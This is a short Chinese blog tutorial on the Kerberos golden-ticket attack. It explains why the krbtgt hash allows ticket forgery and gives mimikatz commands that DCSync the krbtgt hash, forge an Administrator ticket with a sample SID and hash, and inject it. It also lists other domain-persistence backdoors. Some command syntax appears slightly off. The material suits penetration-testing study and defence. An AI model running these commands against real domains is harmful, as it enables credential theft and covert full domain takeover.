kerberos黄金票据

发表于 | 分类于 | | 阅读次数:
字数统计: 186 字 | 阅读时长 ≈ 3 分钟

原理
每个用户的Ticket都是由krbtgt的密码Hash来生成的,那么,我们如果拿到了krbtgt的密码Hash,不就可以随意伪造Ticket了吗?

实际上只要拿到了域控权限,在上面就可以很容易的获得krbtgt的Hash值,再通过mimikatz即可生成任意用户任何权限的Ticket,也就是Golden Ticket

获取krbtgt

1
mimikatz log "lsadump::dcsync /domaintest.com /user:krbtgt"

构造黄金票据并注入内存

1
2
3
4
mimikatz # kerberos::purge
mimikatz # kerberos::golden /admin:Administrator /domain:domaintest.com /sid:S-1-5-21-3883552807-251258116-2724407435 /krbtgt:6a8e501fabcf264c70ef3316c6aab7dc /ticket:Administrator.kiribi
mimikatz # kerberos::ptt Administrator.kiribi
mimikatz # kerberos::tgt

当然除了golden ticket,silver ticket之外还有kerberos ticket,历史SID,AdminSDHolder,DSRM,GPP,DCSync等技术手段都可以用来当做域控的隐藏后门。

域渗透——Pass The Ticket

本文标题:kerberos黄金票据

文章作者:boogle

发布时间:2018年08月27日 - 15:25

最后更新:2019年03月07日 - 11:36

原始链接:https://zhengbao.wang/kerberos黄金票据/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

感觉写的不错,给买个棒棒糖呗